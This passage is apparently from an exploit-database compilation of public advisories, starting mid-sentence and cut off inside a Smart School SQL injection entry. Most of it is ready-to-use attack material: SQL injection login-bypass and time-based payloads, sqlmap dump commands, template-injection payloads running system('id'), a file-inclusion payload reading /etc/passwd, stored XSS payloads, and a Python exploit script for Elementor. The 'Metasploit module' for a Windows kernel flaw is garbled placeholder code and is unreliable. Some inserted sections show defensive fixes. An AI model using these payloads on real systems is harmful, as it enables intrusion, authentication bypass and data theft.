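The validator is the first layer only: the controls that make a slipped-through file harmless are serving uploads from a directory where the web server does not execute scripts (or from a separate static host) and re-encoding images server-side so that any trailing payload is discarded.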
-
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
#############################################
# Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################

```ruby
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )

    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end

  def check
    connect
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Appears
  end

  def exploit
    connect
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
    handler
    disconnect
  end
end
```

# Reference : https://nvd.nist.gov/vuln/detail/CVE-2024-21338
-
FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
Date: 03/28/2024
Exploit Author: Chokri Hammedi
Vendor Homepage: https://flarum.org/
Software Link: https://github.com/FriendsOfFlarum/pretty-mail
Version: 1.1.2
Tested on: Windows XP
CVE: N/A

Description:
The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure.

Steps to Reproduce:
- Log in as an administrator on the Flarum forum.
- Navigate to the FoF Pretty Mail extension settings.
- Edit the email default template and insert the following payload at the end of the template:
  {{ include('/etc/passwd') }}
- Save the changes to the email template.
- Trigger any action that sends an email, such as user registration or password reset.
- The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.
-
FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)
Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)
Date: 03/28/2024
Exploit Author: Chokri Hammedi
Vendor Homepage: https://flarum.org/
Software Link: https://github.com/FriendsOfFlarum/pretty-mail
Version: 1.1.2
Tested on: Windows XP
CVE: N/A

Description:
The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side Template Injection (SSTI) due to the unsafe handling of template variables. An attacker with administrative access can inject malicious code into the email template, leading to arbitrary code execution on the server.

Steps to Reproduce:
- Log in as an administrator on the Flarum forum.
- Navigate to the FoF Pretty Mail extension settings.
- Edit the email default template and insert the following payload:
  {{ 7*7 }}
  {{ system('id') }}
  {{ system('echo "Take The Rose"') }}
- Save the changes to the email template.
- Trigger any action that sends an email, such as user registration or password reset.
- The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo "Take The Rose"') }}) in the email content.
-
Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24494

### Stored Cross-Site Scripting (XSS):

> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.

### Affected Components:

> add-tracker.php, update-tracker.php

Vulnerable parameters:

- day
- exercise
- pray
- read_book
- vitamins
- laundry
- alcohol
- meat

### Description:

> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it in the database and reflecting it back on the page.

## Proof of Concept:

The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.

Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:

```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
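The stored XSS entries on this page (Hospital Management System, E-INSUARANCE, this Daily Habit Tracker one and the Blood Bank one further down) all share one root cause: stored values are written into HTML text and attribute contexts without output encoding. The following is an added example, not code from any of those projects: a vulnerable row renderer beside an encoded one, and a small parser-based audit that shows what tags a browser would build from each. The payloads are the ones quoted in the advisories; `render_row_vulnerable`, `render_row_safe`, `TagCollector` and `audit_render` are this example's own.

```python
import html
from html.parser import HTMLParser


def render_row_vulnerable(day, note):
    """The advisories' pattern: stored values dropped straight into a text node and an attribute."""
    return f'<tr><td>{day}</td><td><input value="{note}"></td></tr>'


def render_row_safe(day, note):
    """Encode at output time for each context: html.escape converts & < > and, with
    quote=True, also " and ', so neither the text node nor the quoted attribute can be
    broken out of. The stored value itself is left unchanged."""
    return f'<tr><td>{html.escape(day)}</td><td><input value="{html.escape(note, quote=True)}"></td></tr>'


class TagCollector(HTMLParser):
    """Records the start tags a browser-like parser builds from a fragment, and the
    decoded value of the input's value attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def audit_render(renderer, day, note):
    """Render with `renderer` and report the markup the stored values turn into."""
    p = TagCollector()
    p.feed(renderer(day, note))
    p.close()
    return {"tags": p.tags, "input_value": p.input_value}


# Payloads quoted in the stored XSS advisories on this page.
XSS_DAY = "Tuesday<script>alert('STORED_XSS')</script>"
XSS_NOTE = '"><svg/onload=alert(document.domain)>'

if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_row_vulnerable), ("safe", render_row_safe)):
        print(f"{name:10}", audit_render(renderer, XSS_DAY, XSS_NOTE))
```

The safe renderer yields exactly the template's four tags and the input's value round-trips as the literal string, which is the property to test for: encoding belongs at the output boundary, per context (text, attribute, URL, JavaScript), rather than in a blacklist applied when the value is stored.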
-
Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)
# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24497

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> /employee_akpoly/Admin/login.php
> Two parameters, `txtusername` and `txtpassword`, within the admin login mechanism are vulnerable to SQL Injection.

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### Manual Exploitation

The payload `' and 1=1-- -` can be used to bypass authentication on the admin login page.

```
POST /employee_akpoly/Admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/login.php
Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=
```

### SQLMap

Save the following request to `admin_login.txt`:

```
POST /employee_akpoly/Admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

txtusername=admin&txtpassword=password&btnlogin=
```

Use `sqlmap` with the `-r` option to exploit the vulnerability:

```
sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
```

## Recommendations

When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
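The "Recommendations" sections of this entry and the `txtfullname`/`txtphone` one above both ask for input sanitization; the fix that actually removes the bug is to stop splicing form values into SQL text at all. The following is an added example, not the application's code: an in-memory SQLite login table with a constructed account, the concatenated query from the advisory beside a bound-parameter version, and the `' and 1=1-- -` payload from the manual proof of concept run through both. `setup_db`, `login_vulnerable`, `login_safe` and the credentials are this example's own.

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt):
    """PBKDF2-SHA256 for the demo; the iteration count is illustrative, not production guidance."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def setup_db():
    """In-memory table with one constructed admin account.

    The plaintext `password` column exists only so the vulnerable query can be reproduced
    as the advisory describes it; the safe path uses `salt`/`pw_hash` and never stores
    the plaintext.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
                 "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admin (username, password, salt, pw_hash) VALUES (?, ?, ?, ?)",
                 ("admin", "correct-horse-battery", salt, hash_password("correct-horse-battery", salt)))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The advisory's pattern: form fields concatenated into the SQL text. A quote in
    txtusername closes the string literal and `-- -` comments out the password check."""
    sql = f"SELECT id FROM admin WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Bound parameters: the driver never splices the value into the statement, so quotes
    and comment sequences are compared as ordinary characters. The password is then
    verified against the stored hash with a constant-time comparison."""
    row = conn.execute("SELECT salt, pw_hash FROM admin WHERE username = ?", (username,)).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(hash_password(password, salt), pw_hash)


if __name__ == "__main__":
    conn = setup_db()
    payload = "admin' and 1=1-- -"
    print("vulnerable, real credentials:", login_vulnerable(conn, "admin", "correct-horse-battery"))
    print("vulnerable, payload + wrong: ", login_vulnerable(conn, payload, "wrong"))
    print("safe, real credentials:      ", login_safe(conn, "admin", "correct-horse-battery"))
    print("safe, payload + wrong:       ", login_safe(conn, payload, "wrong"))
```

The same change applies to the `edit_profile.php` parameters: in PHP the equivalent is a prepared statement (`$stmt->bind_param(...)` in mysqli or `$stmt->execute([...])` in PDO) in place of string interpolation, with "special character restrictions" left as a secondary control.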
-
Daily Habit Tracker 1.0 - SQL Injection
# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > delete-tracker.php ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. 
## Proof of Concept:

### Manual Exploitation

The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

### SQLMap

Save the following request to `delete_tracker.txt`:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

Use `sqlmap` with the `-r` option to exploit the vulnerability:

```
sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
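Added example (not part of either advisory): the two injected values from the Employee Management System login post above (`admin' and 1=1-- -`) and from this post's `tracker` parameter, run against an in-memory SQLite stand-in, once through a string-concatenated query and once through a bound-parameter query, which is the fix both Recommendations sections call for. Table and column names are assumptions, since neither advisory gives the schema.

```python
import sqlite3

# Constructed sample data standing in for the two applications' tables. Neither
# advisory gives the schema, so table and column names are assumptions, and the
# admin passwords are kept in clear only to keep the example short.
ADMIN_ROWS = [("admin", "S3cret-Pass"), ("hr", "Another-Pass")]
TRACKER_IDS = [4, 5, 6]

# Injected values taken from the two advisories' requests (URL-decoded).
LOGIN_BYPASS_USER = "admin' and 1=1-- -"        # Employee Management System login
TRACKER_PAYLOAD = "5'\"\";SELECT SLEEP(5)#"     # Daily Habit Tracker ?tracker=


def setup_db():
    """In-memory SQLite database holding both sample tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?, ?)", ADMIN_ROWS)
    conn.execute("CREATE TABLE tbl_tracker (tbl_tracker_id INTEGER)")
    conn.executemany("INSERT INTO tbl_tracker VALUES (?)", [(i,) for i in TRACKER_IDS])
    return conn


def login_vulnerable(conn, username, password):
    """Concatenated query, as a vulnerable login.php would build it: the quote
    closes the literal and `-- -` comments out the password check, so any
    password is accepted for 'admin'. Returns the matched username or None."""
    sql = ("SELECT username FROM admin WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Bound parameters: the quote and comment are data, never SQL syntax."""
    row = conn.execute("SELECT username FROM admin WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row[0] if row else None


def delete_tracker_vulnerable(conn, tracker):
    """Concatenated DELETE, as in delete-tracker.php?tracker=... The injected
    value reaches the parser as syntax (SQLite rejects it with an error; in the
    advisory the same value made MySQL sleep 5 s). Returns rows deleted or the
    error text."""
    try:
        cur = conn.execute("DELETE FROM tbl_tracker WHERE tbl_tracker_id=" + tracker)
        return cur.rowcount
    except sqlite3.Error as exc:
        return f"error: {exc}"


def delete_tracker_fixed(conn, tracker):
    """Bound parameter: the payload is compared as a value and matches nothing."""
    cur = conn.execute("DELETE FROM tbl_tracker WHERE tbl_tracker_id=?", (tracker,))
    return cur.rowcount


def tracker_count(conn):
    """Rows left in the tracker table, to show what each variant changed."""
    return conn.execute("SELECT COUNT(*) FROM tbl_tracker").fetchone()[0]


if __name__ == "__main__":
    db = setup_db()
    print("login, concatenated:", login_vulnerable(db, LOGIN_BYPASS_USER, "password"))
    print("login, parameterised:", login_fixed(db, LOGIN_BYPASS_USER, "password"))
    print("delete, concatenated:", delete_tracker_vulnerable(db, TRACKER_PAYLOAD))
    print("delete, parameterised:", delete_tracker_fixed(db, TRACKER_PAYLOAD),
          "rows; remaining:", tracker_count(db))
```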
-
Blood Bank v1.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46020

-------------------------------------------------------------------------------

# Description:

The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.

Vulnerable File: updateprofile.php
Parameters: rename, remail, rphone, rcity

# Proof of Concept:
----------------------

1. Intercept the POST request to updateprofile.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: "><svg/onload=alert(document.domain)>
4. Example request for rname parameter:

```
POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
```

5. Go to the profile page and trigger the XSS

XSS Payload: "><svg/onload=alert(document.domain)>
-
Daily Habit Tracker 1.0 - Broken Access Control
# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24496

### Broken Access Control:

> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.

### Affected Components:

> home.php, add-tracker.php, delete-tracker.php, update-tracker.php

### Description:

> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.

## Proof of Concept:

### Unauthenticated Access to Home page

> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.

### Create Tracker as Unauthenticated User

To create a tracker, use the following request:

```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```

### Update Tracker as Unauthenticated User

To update a tracker, use the following request:

```
POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
```

### Delete Tracker as Unauthenticated User:

To delete a tracker, use the following request:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.
-
Elementor Website Builder < 3.12.2 - Admin+ SQLi
#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi
#References
#CVE : CVE-2023-0329
#E1.Coders

#Open Burp Suite.
#In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.
#Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.
#Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.
#On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":
#code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#
#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.
#Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".
#The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.
#Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.
#
#References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/

#Exploit Python :
#The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:
#This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.
#Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct

```
import requests

# Set the target URL and SQLi payload
url = "http://localhost:8080/wp-admin/admin-ajax.php"
data = {
    "action": "elementor_ajax_save_builder",
    "editor_post_id": "1",
    "post_id": "1",
    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"
}

# Send the request to the target URL
response = requests.post(url, data=data)

# Check if the response indicates a successful SQL injection
if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:
    print("SQL Injection successful!")
else:
    print("SQL Injection failed.")
```
-
Smart School 6.4.1 - SQL Injection
# Exploit Title: Smart School 6.4.1 - SQL Injection
# Exploit Author: CraCkEr
# Date: 28/09/2023
# Vendor: QDocs - qdocs.net
# Vendor Homepage: https://smart-school.in/
# Software Link: https://demo.smart-school.in/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-5495
# CWE: CWE-89 - CWE-74 - CWE-707

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

SQL injection attacks can allow unauthorized access to sensitive data and modification of data, and can crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]

```
POST /course/filterRecords/ HTTP/1.1

searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3
```

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]

Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi

```
---
Parameter: searchdata[0][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
---
```

```
POST /course/filterRecords/ HTTP/1.1

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
```

Path: /online_admission

```
---
Parameter: MULTIPART email ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
